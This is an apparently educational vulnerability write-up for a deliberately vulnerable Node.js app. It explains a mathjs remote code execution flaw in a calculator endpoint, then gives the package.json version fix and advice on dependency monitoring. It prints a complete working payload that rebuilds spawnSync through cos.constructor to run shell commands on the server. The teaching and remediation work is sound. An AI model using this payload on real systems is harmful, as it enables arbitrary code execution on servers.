a9-using-components-with-known-vulnerability.md

Using Components with Known Vulnerabilities

mathjs Remote Code Execution

The version of mathjs(https://www.npmjs.com/package/mathjs) library used in the application has a remote code execution vulnerability that allows an attacker to run arbitrary code on the server.

To understand how the exploit works, look at this

The calculator implementation uses mathjs.eval to evaluate user input at

http://127.0.0.1:9090/app/calc

There is no input validation either, probably because it is going to be a maths equation which will contain symbols

Malicious input that triggers command execution

cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}")();cos.constructor("return spawnSync('id').output[1]")()

Which results in this

Solution

Modify fixed version to compatible version in package.json

...
    "flash": "^1.1.0",
    "mathjs": "^3.10.1",   // Add ^ to install latest compatible version
    "md5": "^2.2.1",
...

Now install the package again by running npm install

Fixes

Implemented in the following files

• package.json

The fix has been implemented in this commit

Recommendation

• Dependencies must be updated regularly, and preferably automatically.
• Solutions like Snyk and NSP can regularly monitor your dependencies and alert you of any vulnerable dependencies.

Reference

• https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities
• https://blog.travis-ci.com/2017-04-20-continuous-security-snyk-travis-ci/